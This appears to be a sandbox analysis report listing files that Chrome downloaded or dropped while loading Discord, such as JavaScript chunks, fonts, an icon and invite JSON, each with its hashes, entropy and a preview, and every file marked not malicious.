                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):5601
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7655360019382895
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:2XobeWK+r3kiJfaaLUmbybQSfuaVRbm0HMgFfgWuAyEdVAmefr4/8VZPUGky:qobvfaa9DSfXDbXMaYPAyEdLefr4/YMe
                                                                                                                                                                                                                                                                                    MD5:13FF42A071C43FA5521C11EB2F2EA914
                                                                                                                                                                                                                                                                                    SHA1:B97D6318B384D57DEFD41EC4DEBF9D7DE198537C
                                                                                                                                                                                                                                                                                    SHA-256:6B8776086567649C2432023184979BB8244A268C081FC1D478D834BF50A169F9
                                                                                                                                                                                                                                                                                    SHA-512:F38C1D3760B23A65EACDB8214424227BDFE638C4A86E6DB89D8D86E29A820060165583FB7794E77935E52B62A6FE09567FC71FB44986D0FBD473F54DEBC56202
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}let s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null};class d extends(i=a.ZP.PersistedStore){initialize(e){null!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusMedia(){return s.wowMomentWumpusMediaUrl}}o(d,"displayName","PurchasedItemsFestivityStore"),o(d,"persistKey","PurchasedItemsFestivityStore"),o(d,"migrations",[e=>({...e})]),t.Z=new d(c.Z,{LOGOUT:function(){s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null}},PURCHASED_ITEMS_FESTIVITY_SET_CAN_PLAY_WOW_MOMENT:functi
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (29176)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):29177
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.495720450509452
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:9yqlOCcCaN1CcPtMjBuvLTBrqDoiba+h3pjeuOXPRTpCLhuYNWnML8:9mKM3ku3UDbzU9JYc/ML8
                                                                                                                                                                                                                                                                                    MD5:E0F6CD9C1211612ECAEFAFF818A482CF
                                                                                                                                                                                                                                                                                    SHA1:D93E4410AB15A1B811BAB233DDE8EE30F2312005
                                                                                                                                                                                                                                                                                    SHA-256:9ECE2D4CA1C0C9E702C3EBE7A92F23C7FA6ADED7DFC75A4CC0ACCF887DCB74EB
                                                                                                                                                                                                                                                                                    SHA-512:62DE3EB2C304F3A8353A1F872A9ADBCBD7A1522DF050D39B12EB1C7DAABD285DE1E0049E0BE032E924D81710D0F276ED845619E8930E44442DAA3F6E3E34FA66
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"fingerprint":"1309974934365405228.oSJWRwO2QrqG9KIUvncqWOtJVIk","assignments":[[2810205487,1,1,-1,3,1543,0,0],[2617218444,4,1,-1,2,491,0,0],[3035674767,0,1,-1,0,7106,0,0],[1609782151,0,1,-1,2,8378,0,0],[3643362751,0,1,-1,0,7193,0,0],[3753034466,1,2,-1,0,9262,0,0],[1913882179,0,1,-1,2,8254,0,0],[1567199723,0,1,-1,1,6569,0,0],[454783470,4,1,-1,0,877,0,0],[3450899088,1,1,-1,0,4048,0,0],[3656796460,3,1,-1,3,3290,0,0],[1814483290,0,1,-1,0,6939,0,0],[4221006726,0,1,-1,0,5150,0,0],[1398673921,1,1,-1,0,6306,0,0],[2532700533,0,1,-1,0,1873,0,0],[3557480712,0,1,-1,0,7026,0,0],[853403133,4,1,-1,0,6566,0,0],[2491005019,4,1,-1,0,2762,0,0],[3889077804,2,1,-1,0,5139,0,0],[4079214319,2,1,-1,0,2443,0,0],[1034661306,0,1,-1,0,8246,0,0],[828251710,2,1,-1,1,3722,0,0],[3124003316,1,1,-1,0,3243,0,0],[2676348506,0,1,-1,0,1141,0,0],[4136574802,0,1,-1,1,2561,0,0],[4049571159,0,1,-1,0,9254,0,0],[3182051840,0,1,-1,0,9211,0,0],[2539540256,0,1,-1,3,6542,0,0],[3991298449,2,1,-1,2,9457,0,0],[472975400,6,1,-1,0,3490,0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 45868, version 3.131
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):45868
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995149406203617
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:7T3lyZzszaXGZG8vNh620Ph+EdGcNo3ITx62hw4oZkha6UK5+Ubp7tSSC5Zn/pf8:7TVyZwzQZ8vNd0Ph9/Nuo6GPUK5+UbJz
                                                                                                                                                                                                                                                                                    MD5:D295C40AF6FCA08F8E0EB5425351F431
                                                                                                                                                                                                                                                                                    SHA1:1D246A1E54B3A1F2428883D8C911AF73EDDFFCA6
                                                                                                                                                                                                                                                                                    SHA-256:5D225B25D66B30563A00F395476ED701130D3F749620A63531CEA09FC537164E
                                                                                                                                                                                                                                                                                    SHA-512:9C9F23CB775244EB10F83F964B36224AD2CD5152CFA5AB82928F68ED1CB49BE4156F887CC40A857B72EFD0833014E4366BF136689A717DD58828A1B195ED486E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/8bd8143eff37936894aa.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2.......,......................................x......\.`..X..@........T..@.6.$........ ..a..K..x[T...5...(..V.M..m...{.9....s49..ybj.......>}.m......O&r.%.T..Q....5.43.yD..u.%.S.w^.B....*1p|b2..g...Wuq.B...2.e~.3..>.I..TLP..c.....c$8..Tle.......U:6Wl.=.....U..V............W .iH8..7...r..~.eo.A......8..T.`.o........&.L".o.E..v....+B...N"].p...d [ ..Z_.w....s....L......,.E..=+.y3l...-......K..5..6....~.r.f..5D..U|W.$...n.f.(6..j.|....B...]..-....]"..5..[g.B..[s..% .[/.D..m.../...U}d....T.<....b......|..Fc..K..2Y..pb}m\..p.....:.hn.6$*F..F..1"E*.h+......&5r..(...||g.N\T.....I.4KD[U.^V..y.{.n%j3.k.....E%...@...<(j.......O....K...0 L...QD.......Q.xzQ...[Y..".1F..1j0F...C.."e.i.wN/<.(...k.".++....`........UW.K3.......}...u+I%........y.o.v.ym....D|f2.cWr@...l;.L.Y..~.&..g.... b[......j..I.i.H.{4n....s.y.`_v7..,...Z...".S.t.J3.[...t+.'b..F.6...Q`.!..B...N.0L.,<.:>......:@.SP..9@2.....rvr0.oJ,.5..p'..V.Js@.....L..%[.%#=.y3.|..V.fa.m;).....G....._
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (467)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):516
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.541837354544169
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:SM4krZur5/TdqA9WhD0AI5NzppzHjxDBTQYfmsSftb5+Youu4aO/QOFaWCUOBd5h:/4kU50Ag23NdDffmxftbcfu4AOB798hg
                                                                                                                                                                                                                                                                                    MD5:3803B930385AA579DDF315B689DB895A
                                                                                                                                                                                                                                                                                    SHA1:EA2FC1CF3A7FA94F6A92CB6ABD04E18F4EDE323B
                                                                                                                                                                                                                                                                                    SHA-256:3193C729E005740AE610C8806B538904D1FC62DACE38E4248DE7633147EC78C8
                                                                                                                                                                                                                                                                                    SHA-512:A8E21B2F9ADD5A038E12B914C2D23670983839B8BED3E9DA54D74AFC8B845CE396707F724DB46EB8EE31A2F02395E3B8E8979908F4F16CEC9533FEE65047C7CB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["88577"],{772416:function(i,a,o){o.r(a),a.default=JSON.parse('{"ofazSU":"Entendido","KUFsLi":"\xa1El cambio fue hecho!","yQfLwM":"Discord est\xe1 configurado en Espa\xf1ol. Puedes elegir otro idioma en \\"Ajustes de aplicaci\xf3n\\" > \\"Idioma\\".","09QGGB":"\xbfCambiar idioma?","xi8rEx":"\xbfTe gustar\xeda configurar Discord en Espa\xf1ol?","QkGMPz":"S\xed","jM7sUl":"No"}')}}]);.//# sourceMappingURL=0a52c6142094387fceed.js.map
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):24565
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.000976601202208
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                                                                                                                                                                                                                                    MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                                                                                                                                                                                                                                    SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                                                                                                                                                                                                                                    SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                                                                                                                                                                                                                                    SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/favicon.ico
                                                                                                                                                                                                                                                                                    Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7679)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):7728
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.087323529198084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:wgSRVk6Wg8lh4Nrviiv1aWPRkDhTt9qwqSBtxCMNMRV0IBSAMD9C+m+rmxARJx3t:RSRVmriLDPRkxtRJxNMRV0IZdSL9ilfA
                                                                                                                                                                                                                                                                                    MD5:1C6B9D0AD743762986197AE0E81874C1
                                                                                                                                                                                                                                                                                    SHA1:EABACE4131BA74B108FC891EA843B4F85B218808
                                                                                                                                                                                                                                                                                    SHA-256:2D739091F602476FCF261435B48A1FAFCE2533564FFF0549D27B47E341B4DCBF
                                                                                                                                                                                                                                                                                    SHA-512:74FDE9F8997087BB107ED5DDC3A4A37BD24793CAAD605FBDCDD54E9D18AF8F44D0C0E92FB2259AA936BD1B20D5537441EF39D9A7F066323911436184B0138111
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null);for(var n=0,r=this.__entries__;n<r.length;n++){var i=r[n];t.call(e,i[1],i[0])}},e}()}(),i="undefined"!
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12244)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):12293
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.57451570624678
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:KO87cE+wCFgcmzFFLt9Wq0f2/pEIcAB6QrIPF43JaW6rYuNBZegk:KO6cE+wCFgFL6q0fcpczipa58z
                                                                                                                                                                                                                                                                                    MD5:7F69DDAD9C9B8471930A1C320E285DBA
                                                                                                                                                                                                                                                                                    SHA1:C89EAD1B19A62CF6BBAD9CB46AF62535EE360DB7
                                                                                                                                                                                                                                                                                    SHA-256:AA17A6E2D044E6E64C1236AA1A983BE7D7C47FA0CD265C6E730928C81E81F33F
                                                                                                                                                                                                                                                                                    SHA-512:059008F59652CB0FF5B6FDFF4C72F78BC8933D355FC4D71424FC258A031D3BEB223CB416FAA85918A82B3715416030E2CF94346CA029725C3887DDE949C4EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/771babda7e3dcee4f677.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["95393"],{392459:function(e){e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 66 38' width='66' height='38'%3E%3Crect x='0' y='0' width='66' height='38' style='fill: rgb(0, 0, 0); stroke: rgb(0, 0, 0);'%3E%3C/rect%3E%3C/svg%3E"},850259:function(e){e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='6.122 5.864 259 50' width='259' height='50'%3E%3Cpath fill='%23000000' fill-rule='evenodd' d='M 68.122 11.864 L 192.122 11.864 C 193.779 11.864 195.122 13.207 195.122 14.864 L 195.122 28.864 C 195.122 30.521 193.779 31.864 192.122 31.864 L 68.122 31.864 C 66.465 31.864 65.122 30.521 65.122 28.864 L 65.122 14.864 C 65.122 13.207 66.465 11.864 68.122 11.864 Z M 68.122 35.864 L 262.122 35.864 C 263.779 35.864 265.122 37.207 265.122 38.864 L 265.122 48.864 C 265.122 50.521 263.779 51.864 262.122 51.864 L 68.122 51.864 C 66.465 51.864 65.122 50.521 6
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 39724, version 2.66
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):39724
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.994965715436545
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:w35mZVsqT7RAo+6tbgLdolT9YSswcTWa+O/dm8ae41u37qt+:1xTO3kb0dolT998WhO/Hae4jt+
                                                                                                                                                                                                                                                                                    MD5:FF5ECCDE83F118CEA0224EBBB9DC3179
                                                                                                                                                                                                                                                                                    SHA1:0AD305614C46BDB6B7BB3445C2430E12AECEE879
                                                                                                                                                                                                                                                                                    SHA-256:13DA02CE62B1A388A7C8D6F3BD286FE774EE2B91AC63D281523E80B2A8A063BC
                                                                                                                                                                                                                                                                                    SHA-512:03DC88F429DD72D9433605C7C0F5659AD8D72F222DA0BB6BF03B46F4A509B17EC2181AF5DB180C2F6D11C02F39A871C651BE82E28FB5859037E1BBF6A7A20F6B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/b21c5111a12372139409.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2.......,......|P.......B............................. .`..P..@..W........<.6.$..`..r.. ..<..F..`[pVq..w.SI..+.S.f;dS.i.. C.bj.6..w;./......OM&..[.mo-......4F`...SeR.XzP.g..j..L.....S.T(a..y.D...od./).....|l...zn...T..OpZP....c\....%.H..y..g.!..!..|._........O._.[.nJS..]..H....rd..#.?.n#.B.w.w...":.u...|.a..#.#N...q.z.Z.....".5...X...3|O...8>......(...H....M|.w.o.%.%..|5.'L.a.N.) ..G`.(1.je.#.~_.......!...7.e.......s.\.`G.^...h.B....tR.N..+"xU....3.F}0....z...@^..iB^....u&....._{.$]..........8k....?.c...^.~...A2...T.$.i.....Ycx!b~.x...3:g.[.!.X...fgt.duf.....uZW!....y..(].$.If_....g69.Ef.'{.ndC..Yt6..*.;..\..M......E'.^I....rFJ..)1|...q......!.m~......../M.........7!I.E...U..!"....:...T9{!=.+... ..es2.2.%.Ll.t.j.D .p..<...$.....%...IB"'..#H.D............;OWk..G.Y.V....\&.U{.V....N.h....S[Yg(......f..Uu......z2.(.r..3...,-...G....c.9^"..:..>.......Q....S......]D'.,.@4..w./S.ep`...].sGR....Vc.j...-.|..}_...*&.eg.G..e.u...(./S..+H.'.9\.k%..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 137140, version 2.459
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):137140
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998481140044296
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:3072:kX89D4n2tV29WN9z2uXw/hqzr7IbI1O1KfB9Bk8WnRSqv2WDc+FC5:kn2tS/IzXIbIo1KZWUqv2W8
                                                                                                                                                                                                                                                                                    MD5:F9BF0F65660D23C6F359D22720FC55AE
                                                                                                                                                                                                                                                                                    SHA1:9FA19AB7EA56165E2138C443816C278D5752DD08
                                                                                                                                                                                                                                                                                    SHA-256:426AE06CD942849AB48B84C287C760F3701B603EBCC5C9AAA4A89923EF5F058E
                                                                                                                                                                                                                                                                                    SHA-512:436019A96E47848533684A34E3C360F516C29B2AA2473D0A05D50C0FD3AD19EAC39DF2DE12B6EC1C6760493EFB5ABF58E6A54D32080226FA1765983435634D88
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/f5b8aa3411dfc24ff2e6.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2..............0....U..........................f........`........$..U.6.$..T..X.. ......[..[.;......w.N....ZjU...]".u..$.k..<..1...3@i...6.I.X......@ydf.h#..................{I~<:..I..C_........#.]7i..q[.+PF.U...x.......1..b..31Va....aB......n.V..&.Q.3cc.L...1f6.-:x.G..`EE.....r ......6..r..F.u..<|..aEX.V......c.L.,....RX....V....FQ.u..q.^.{q.]#.y..I.....19c$..j...k...W.......+.....H.dy....-.c.....X<<.....@.Q=.........:....+....F..z.K..Y..{t..{.*.p..".I......M.X|t........}......nk42...S\.....$H...0...m......#f>EU..-z.k|.. ..Y.'..;<?.......S.C...............weU"...ES.2.>.%...O..q.@....F...0.aR.F|[a..Vq...z|HQ_m-j.3x1.XX.p...T./...z.p|..<-...%;Fx.....8CG&d..FQ.{.'.*.1...1#7..a?.;.G.....~U..4.F..*..*.Q.f...3..t:.~..o};"+...O....>D.x)%.. .O:.x.`N..]..uG.....C.!......%z..g...ZT.p.........5.......@!.S#/6$.k%..]...b=. $0gOC.]G\..lU....DH...(..;.e.B.!GH.5.eY.eY...-.m.....\..&.KYF3...-..........-......d..V.&w..... ..{..C.SZ...p)...d.w,...<....}.@
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17414)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):17463
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.594709634970644
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:5wLnWOUnUuyMNps0HHHsglNzUxBAAdTRIZWiv/XB2P2BY9:yLQne0P5UxMXB2PB9
                                                                                                                                                                                                                                                                                    MD5:91BAF608F20FFC81EF2AF8C0E617267B
                                                                                                                                                                                                                                                                                    SHA1:4FB6FC20D20F3FD37F4C76AC2E3CD26DD92CB9A7
                                                                                                                                                                                                                                                                                    SHA-256:D994CE324ABC3F61CD3996C94774551CE9606BC258DA7E0AFCC5BEFB3614BDA9
                                                                                                                                                                                                                                                                                    SHA-512:17DF587F5D6969C33A550F3FCF69ED44B01D12F0EA77E25B81D441D8E254C3DAEC0093A5F31A6579F3545B9953F2C882D421AB465BC4FF5FD1DD31302231B15E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/6e08830110af09d36881.js
                                                                                                                                                                                                                                                                                    Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26172"],{884835:function(t,e,r){"use strict";var o=r(311596);function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:n};return r.PropTypes=r,r}},639519:function(t,e,r){t.exports=r(884835)()},311596:function(t){"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},58615:function(t,e,r){var o=r(338091);function n(t){this.mode=o.MODE_8BIT_BYTE,this.data=t}n.prototype={getLength:fu
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7029)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):7078
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.693672087902241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:EDHGzBioMyirXyf70li//fZc8Twtv1T5aLdMu951f54aH8L:EDmlioLirXyfYlw/xHWOyuB+acL
                                                                                                                                                                                                                                                                                    MD5:45A3EE5FF96BDB2DD7FBB2846B5EA494
                                                                                                                                                                                                                                                                                    SHA1:795E2BB4E00AB75A91BDBA9A4C7D9E2B2E0CD905
                                                                                                                                                                                                                                                                                    SHA-256:08F280458FAB95C2E5754187C406458A8FE69A1C12329C8EF6CB801067E00BB6
                                                                                                                                                                                                                                                                                    SHA-512:D545E8F9FE857A5A3AC908E1CCDA13ADCD19EFA78AE34143BCB36080C228090B8C5AE446EFE51C4A87A22BD9403B6E851219B331274D8929EB20AF81E9B159F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43222"],{340618:function(r,t,o){var e=o(354848),n=String,c=TypeError;r.exports=function(r){if("object"==typeof r||e(r))return r;throw c("Can't set "+n(r)+" as a prototype")}},442975:function(r,t,o){var e=o(936940);r.exports=!e(function(){function r(){}return r.prototype.constructor=null,Object.getPrototypeOf(new r)!==r.prototype})},33995:function(r){r.exports={IndexSizeError:{s:"INDEX_SIZE_ERR",c:1,m:1},DOMStringSizeError:{s:"DOMSTRING_SIZE_ERR",c:2,m:0},HierarchyRequestError:{s:"HIERARCHY_REQUEST_ERR",c:3,m:1},WrongDocumentError:{s:"WRONG_DOCUMENT_ERR",c:4,m:1},InvalidCharacterError:{s:"INVALID_CHARACTER_ERR",c:5,m:1},NoDataAllowedError:{s:"NO_DATA_ALLOWED_ERR",c:6,m:0},NoModificationAllowedError:{s:"NO_MODIFICATION_ALLOWED_ERR",c:7,m:1},NotFoundError:{s:"NOT_FOUND_ERR",c:8,m:1},NotSupportedError:{s:"NOT_SUPPORTED_ERR",c:9,m:1},InUseAttributeError:{s:"INUSE_ATTRIBUTE_ERR",c:10,m:1},InvalidStateError:{
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):973
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.083490666926755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Y7KFtAfSBjYVkzoEKfbyN6Kwi03t1/BqUorFv:Y7kCfS9YVEEbuwH3r/EZ
                                                                                                                                                                                                                                                                                    MD5:9F3AF909D4870F7075AF0B630E5BE23C
                                                                                                                                                                                                                                                                                    SHA1:14E91902DADDA2870B5566A5E2ACF65AB662B385
                                                                                                                                                                                                                                                                                    SHA-256:0391062D1665B23A60C3CC27E3CFE1EC69A1AB01C56D745A02F949FCA2066A36
                                                                                                                                                                                                                                                                                    SHA-512:27F8CA5968C097EE8CA9009080BC0AE45F1B012416955B2C73B69F1A798CC47071B65692A464208D8EEAE215DB43CBDD9913A1A54A7FAE590B410A60B3EC5036
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"type":0,"code":"BNXa5rYFXM","inviter":{"id":"984391008039096330","username":"9wda","avatar":"bb19c91a787f443a5fbe82a173daa4f3","discriminator":"0","public_flags":256,"flags":256,"banner":null,"accent_color":null,"global_name":"no name","avatar_decoration_data":null,"banner_color":null,"clan":null,"primary_guild":null},"expires_at":null,"flags":2,"guild":{"id":"1250434927087058944","name":"NO NAME","splash":null,"banner":null,"description":null,"icon":"06f5aa2f0dfc1da41888860135dc216c","features":["AUTO_MODERATION","SOUNDBOARD"],"verification_level":0,"vanity_url_code":null,"nsfw_level":0,"nsfw":false,"premium_subscription_count":1},"guild_id":"1250434927087058944","channel":{"id":"1260598578452369499","type":0,"name":"\ud83d\udce2\u1cbc\u2022\u1cbc\ud835\uddd4\ud835\udde1\ud835\udde1\ud835\udde2\ud835\udde8\ud835\udde1\ud835\uddd6\ud835\uddd8\ud835\udde0\ud835\uddd8\ud835\udde1\ud835\udde7"},"approximate_member_count":1808,"approximate_presence_count":191}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16223)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16272
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.580834693610943
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:M7bek/HNfVFGOSH4vgk+FaHXHrC7Cq3DssOeyjY+0th:gbek/7VwEgk6a3LC7Cq3kan
                                                                                                                                                                                                                                                                                    MD5:1CE0867EF5AB681018D7E32E7197DD4D
                                                                                                                                                                                                                                                                                    SHA1:09300C5379BBA5143C4457F5A9C5CAB29815DA43
                                                                                                                                                                                                                                                                                    SHA-256:FE0EACF4489CF4CA8E0314B19F4A52E69E369497ECDEF2F4EE20A7541D16F217
                                                                                                                                                                                                                                                                                    SHA-512:23701CCBA34CCB5365895BDD24C95BF055E8F81BCEC723F5F1051856E9DFCCB3D41F2F1E535FDB8E73A51D27DFFEB800F345486A111257BDF2C09366B7F9B7CD
                                                                                                                                                                                                                                                                                    Malicious:false
